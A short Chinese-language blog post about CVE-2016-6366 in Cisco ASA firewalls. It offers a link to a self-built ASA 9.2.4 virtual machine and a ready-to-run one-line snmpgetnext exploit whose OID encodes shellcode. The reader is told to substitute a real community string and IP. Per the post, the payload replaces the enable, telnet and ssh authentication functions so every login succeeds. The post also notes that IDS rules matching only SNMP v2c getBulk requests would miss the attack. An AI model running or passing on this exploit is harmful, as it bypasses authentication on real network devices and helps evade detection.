标题: 单条snmpgetnext命令完成对Cisco ASA SNMP RCE/CVE-2016-6366的利用

https://scz.617.cn/misc/201612201424.txt

前些日子制做了一款Cisco ASA 9.2.4的VMware虚拟机

http://pan.baidu.com/s/1nv6mPJj

解压密码是文件全名。超级干净版本，只做了激活，内置asdm-761.bin，未做其他任
何配置。但我配置过，telnet、ssh、snmp、https、asdm无问题。

在世界范围内搜不到这个版本的虚拟机，能搜到的最高版本估计是9.1.5。注意区分
ASA与ASAv。

我就当做好人好事了。

CVE-2016-6366曾经是NSA发现的0day，当然，现在这个时刻点早已不是。这个洞诱使
我研究了一下Cisco ASA的虚拟化以及远程调试，涨了不少经验值。泄露的方程式资
料中包含该洞的Exploit，直至8.4.4版。后来有人给了更高版本的信息。这里没有新
东西，只是从美学角度给一个更简洁的利用方式，单条snmpgetnext命令完成攻击。

这是针对Cisco ASA 9.2.4的:

$ snmpgetnext -v1 -On -c <community> <ip> .1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.48.184.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.192.52.184.9.163.0.91.8.8.97.104.54.209.39.9.128.195.16.191.11.15.15.15.137.229.131.197.76.195.1.1.1.1.1.1.1.1.1.1.1.1.1.101.190.10.8.139.124.36.20.139.7.255.224

将<community>、<ip>换成实际值。攻击得手后，目标的enable、telnet、ssh口令认
证函数被替换，始终认为认证通过。

单就该洞而言上述攻击方式更简洁，但我丝毫没有鄙视NSA原Exploit的意思，人家那
是自动化、模板化、广谱式的框架，不是单单针对这个洞来的。过去有些白痴看不到
别人代码背后的真实意图，以为找到了瑕疵而沾沾自喜。

是否有NIPS规则在傻傻地检查:

version: v2c (1)
data: getBulkRequest (5)

如果是，那就漏报了。